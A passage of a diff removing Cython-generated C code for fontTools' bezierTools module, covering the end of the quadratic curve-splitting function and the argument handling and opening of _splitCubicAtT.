<<<<<<<<<<<<<< - * - * pt1, pt2, pt3 = calcQuadraticPoints((a1x, a1y), (b1x, b1y), (c1x, c1y)) - */ - __pyx_t_2 = PyNumber_Multiply(__pyx_v_ay, __pyx_v_t1_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 721, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_8 = PyNumber_Multiply(__pyx_v_by, __pyx_v_t1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 721, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_4 = PyNumber_Add(__pyx_t_2, __pyx_t_8); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 721, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = PyNumber_Add(__pyx_t_4, __pyx_v_cy); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 721, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_XDECREF_SET(__pyx_v_c1y, __pyx_t_8); - __pyx_t_8 = 0; - - /* "fontTools/misc/bezierTools.py":723 - * c1y = ay * t1_2 + by * t1 + cy - * - * pt1, pt2, pt3 = calcQuadraticPoints((a1x, a1y), (b1x, b1y), (c1x, c1y)) # <<<<<<<<<<<<<< - * segments.append((pt1, pt2, pt3)) - * return segments - */ - __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_calcQuadraticPoints); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_a1x); - __Pyx_GIVEREF(__pyx_v_a1x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_a1x)) __PYX_ERR(0, 723, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_a1y); - __Pyx_GIVEREF(__pyx_v_a1y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_a1y)) __PYX_ERR(0, 723, __pyx_L1_error); - __pyx_t_9 = PyTuple_New(2); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_INCREF(__pyx_v_b1x); - __Pyx_GIVEREF(__pyx_v_b1x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_9, 0, __pyx_v_b1x)) __PYX_ERR(0, 723, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_b1y); - __Pyx_GIVEREF(__pyx_v_b1y); - if 
(__Pyx_PyTuple_SET_ITEM(__pyx_t_9, 1, __pyx_v_b1y)) __PYX_ERR(0, 723, __pyx_L1_error); - __pyx_t_10 = PyTuple_New(2); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_INCREF(__pyx_v_c1x); - __Pyx_GIVEREF(__pyx_v_c1x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_10, 0, __pyx_v_c1x)) __PYX_ERR(0, 723, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c1y); - __Pyx_GIVEREF(__pyx_v_c1y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_10, 1, __pyx_v_c1y)) __PYX_ERR(0, 723, __pyx_L1_error); - __pyx_t_11 = NULL; - __pyx_t_12 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_4))) { - __pyx_t_11 = PyMethod_GET_SELF(__pyx_t_4); - if (likely(__pyx_t_11)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); - __Pyx_INCREF(__pyx_t_11); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_4, function); - __pyx_t_12 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_11, __pyx_t_2, __pyx_t_9, __pyx_t_10}; - __pyx_t_8 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_12, 3+__pyx_t_12); - __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_8))) || (PyList_CheckExact(__pyx_t_8))) { - PyObject* sequence = __pyx_t_8; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 3)) { - if (size > 3) __Pyx_RaiseTooManyValuesError(3); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 723, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_4 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_10 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_9 = PyTuple_GET_ITEM(sequence, 2); - } else { - __pyx_t_4 = 
PyList_GET_ITEM(sequence, 0); - __pyx_t_10 = PyList_GET_ITEM(sequence, 1); - __pyx_t_9 = PyList_GET_ITEM(sequence, 2); - } - __Pyx_INCREF(__pyx_t_4); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(__pyx_t_9); - #else - __pyx_t_4 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_10 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __pyx_t_9 = PySequence_ITEM(sequence, 2); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - #endif - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_2 = PyObject_GetIter(__pyx_t_8); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); - index = 0; __pyx_t_4 = __pyx_t_5(__pyx_t_2); if (unlikely(!__pyx_t_4)) goto __pyx_L11_unpacking_failed; - __Pyx_GOTREF(__pyx_t_4); - index = 1; __pyx_t_10 = __pyx_t_5(__pyx_t_2); if (unlikely(!__pyx_t_10)) goto __pyx_L11_unpacking_failed; - __Pyx_GOTREF(__pyx_t_10); - index = 2; __pyx_t_9 = __pyx_t_5(__pyx_t_2); if (unlikely(!__pyx_t_9)) goto __pyx_L11_unpacking_failed; - __Pyx_GOTREF(__pyx_t_9); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_2), 3) < 0) __PYX_ERR(0, 723, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - goto __pyx_L12_unpacking_done; - __pyx_L11_unpacking_failed:; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 723, __pyx_L1_error) - __pyx_L12_unpacking_done:; - } - __Pyx_XDECREF_SET(__pyx_v_pt1, __pyx_t_4); - __pyx_t_4 = 0; - __Pyx_XDECREF_SET(__pyx_v_pt2, __pyx_t_10); - __pyx_t_10 = 0; - __Pyx_XDECREF_SET(__pyx_v_pt3, __pyx_t_9); - __pyx_t_9 = 0; - - /* "fontTools/misc/bezierTools.py":724 - * - * pt1, 
pt2, pt3 = calcQuadraticPoints((a1x, a1y), (b1x, b1y), (c1x, c1y)) - * segments.append((pt1, pt2, pt3)) # <<<<<<<<<<<<<< - * return segments - * - */ - __pyx_t_8 = PyTuple_New(3); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 724, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_8, 0, __pyx_v_pt1)) __PYX_ERR(0, 724, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_8, 1, __pyx_v_pt2)) __PYX_ERR(0, 724, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt3); - __Pyx_GIVEREF(__pyx_v_pt3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_8, 2, __pyx_v_pt3)) __PYX_ERR(0, 724, __pyx_L1_error); - __pyx_t_3 = __Pyx_PyList_Append(__pyx_v_segments, __pyx_t_8); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(0, 724, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - - /* "fontTools/misc/bezierTools.py":709 - * bx, by = b - * cx, cy = c - * for i in range(len(ts) - 1): # <<<<<<<<<<<<<< - * t1 = ts[i] - * t2 = ts[i + 1] - */ - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":725 - * pt1, pt2, pt3 = calcQuadraticPoints((a1x, a1y), (b1x, b1y), (c1x, c1y)) - * segments.append((pt1, pt2, pt3)) - * return segments # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_INCREF(__pyx_v_segments); - __pyx_r = __pyx_v_segments; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":701 - * - * - * def _splitQuadraticAtT(a, b, c, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * segments = [] - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_XDECREF(__pyx_t_11); - __Pyx_AddTraceback("fontTools.misc.bezierTools._splitQuadraticAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_ts); - 
__Pyx_XDECREF(__pyx_v_segments); - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_i); - __Pyx_XDECREF(__pyx_v_t1); - __Pyx_XDECREF(__pyx_v_t2); - __Pyx_XDECREF(__pyx_v_delta); - __Pyx_XDECREF(__pyx_v_delta_2); - __Pyx_XDECREF(__pyx_v_a1x); - __Pyx_XDECREF(__pyx_v_a1y); - __Pyx_XDECREF(__pyx_v_b1x); - __Pyx_XDECREF(__pyx_v_b1y); - __Pyx_XDECREF(__pyx_v_t1_2); - __Pyx_XDECREF(__pyx_v_c1x); - __Pyx_XDECREF(__pyx_v_c1y); - __Pyx_XDECREF(__pyx_v_pt1); - __Pyx_XDECREF(__pyx_v_pt2); - __Pyx_XDECREF(__pyx_v_pt3); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":728 - * - * - * def _splitCubicAtT(a, b, c, d, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * ts.insert(0, 0.0) - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_42_splitCubicAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_41_splitCubicAtT, "_splitCubicAtT(a, b, c, d, *ts)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_42_splitCubicAtT = {"_splitCubicAtT", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_42_splitCubicAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_41_splitCubicAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_42_splitCubicAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_a = 0; - PyObject *__pyx_v_b = 0; - PyObject *__pyx_v_c = 0; - PyObject *__pyx_v_d = 0; - PyObject 
*__pyx_v_ts = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_splitCubicAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - __pyx_v_ts = __Pyx_ArgsSlice_FASTCALL(__pyx_args, 4, __pyx_nargs); - if (unlikely(!__pyx_v_ts)) { - __Pyx_RefNannyFinishContext(); - return NULL; - } - __Pyx_GOTREF(__pyx_v_ts); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_c,&__pyx_n_s_d,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - default: - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 728, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 728, __pyx_L3_error) - else { - 
__Pyx_RaiseArgtupleInvalid("_splitCubicAtT", 0, 4, 4, 1); __PYX_ERR(0, 728, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 728, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_splitCubicAtT", 0, 4, 4, 2); __PYX_ERR(0, 728, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_d)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 728, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_splitCubicAtT", 0, 4, 4, 3); __PYX_ERR(0, 728, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - const Py_ssize_t used_pos_args = (kwd_pos_args < 4) ? kwd_pos_args : 4; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, used_pos_args, "_splitCubicAtT") < 0)) __PYX_ERR(0, 728, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs < 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_a = values[0]; - __pyx_v_b = values[1]; - __pyx_v_c = values[2]; - __pyx_v_d = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_splitCubicAtT", 0, 4, 4, __pyx_nargs); __PYX_ERR(0, 728, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - 
__Pyx_DECREF(__pyx_v_ts); __pyx_v_ts = 0; - __Pyx_AddTraceback("fontTools.misc.bezierTools._splitCubicAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_41_splitCubicAtT(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_c, __pyx_v_d, __pyx_v_ts); - - /* function exit code */ - __Pyx_DECREF(__pyx_v_ts); - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_41_splitCubicAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d, PyObject *__pyx_v_ts) { - PyObject *__pyx_v_segments = NULL; - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_dx = NULL; - PyObject *__pyx_v_dy = NULL; - PyObject *__pyx_v_i = NULL; - PyObject *__pyx_v_t1 = NULL; - PyObject *__pyx_v_t2 = NULL; - PyObject *__pyx_v_delta = NULL; - PyObject *__pyx_v_delta_2 = NULL; - PyObject *__pyx_v_delta_3 = NULL; - PyObject *__pyx_v_t1_2 = NULL; - PyObject *__pyx_v_t1_3 = NULL; - PyObject *__pyx_v_a1x = NULL; - PyObject *__pyx_v_a1y = NULL; - PyObject *__pyx_v_b1x = NULL; - PyObject *__pyx_v_b1y = NULL; - PyObject *__pyx_v_c1x = NULL; - PyObject *__pyx_v_c1y = NULL; - PyObject *__pyx_v_d1x = NULL; - PyObject *__pyx_v_d1y = NULL; - PyObject *__pyx_v_pt1 = NULL; - PyObject *__pyx_v_pt2 = NULL; - PyObject *__pyx_v_pt3 = NULL; - PyObject *__pyx_v_pt4 = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - int __pyx_t_3; - PyObject *__pyx_t_4 = NULL; - 
PyObject *(*__pyx_t_5)(PyObject *); - Py_ssize_t __pyx_t_6; - PyObject *(*__pyx_t_7)(PyObject *); - PyObject *__pyx_t_8 = NULL; - PyObject *__pyx_t_9 = NULL; - PyObject *__pyx_t_10 = NULL; - PyObject *__pyx_t_11 = NULL; - PyObject *__pyx_t_12 = NULL; - int __pyx_t_13; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_splitCubicAtT", 0); - __Pyx_INCREF(__pyx_v_ts); - - /* "fontTools/misc/bezierTools.py":729 - * - * def _splitCubicAtT(a, b, c, d, *ts): - * ts = list(ts) # <<<<<<<<<<<<<< - * ts.insert(0, 0.0) - * ts.append(1.0) - */ - __pyx_t_1 = PySequence_List(__pyx_v_ts); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 729, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF_SET(__pyx_v_ts, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":730 - * def _splitCubicAtT(a, b, c, d, *ts): - * ts = list(ts) - * ts.insert(0, 0.0) # <<<<<<<<<<<<<< - * ts.append(1.0) - * segments = [] - */ - __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_ts, __pyx_n_s_insert); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 730, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_tuple__2, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 730, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":731 - * ts = list(ts) - * ts.insert(0, 0.0) - * ts.append(1.0) # <<<<<<<<<<<<<< - * segments = [] - * ax, ay = a - */ - __pyx_t_3 = __Pyx_PyObject_Append(__pyx_v_ts, __pyx_float_1_0); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(0, 731, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":732 - * ts.insert(0, 0.0) - * ts.append(1.0) - * segments = [] # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 732, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_v_segments = ((PyObject*)__pyx_t_2); - __pyx_t_2 = 0; 
- - /* "fontTools/misc/bezierTools.py":733 - * ts.append(1.0) - * segments = [] - * ax, ay = a # <<<<<<<<<<<<<< - * bx, by = b - * cx, cy = c - */ - if ((likely(PyTuple_CheckExact(__pyx_v_a))) || (PyList_CheckExact(__pyx_v_a))) { - PyObject* sequence = __pyx_v_a; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 733, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 733, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 733, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_4 = PyObject_GetIter(__pyx_v_a); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 733, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); - index = 0; __pyx_t_2 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_4), 2) < 0) __PYX_ERR(0, 733, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 733, 
__pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_ax = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_ay = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":734 - * segments = [] - * ax, ay = a - * bx, by = b # <<<<<<<<<<<<<< - * cx, cy = c - * dx, dy = d - */ - if ((likely(PyTuple_CheckExact(__pyx_v_b))) || (PyList_CheckExact(__pyx_v_b))) { - PyObject* sequence = __pyx_v_b; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 734, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 734, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 734, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_4 = PyObject_GetIter(__pyx_v_b); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 734, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); - index = 0; __pyx_t_1 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_4), 2) < 0) __PYX_ERR(0, 734, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_4); 
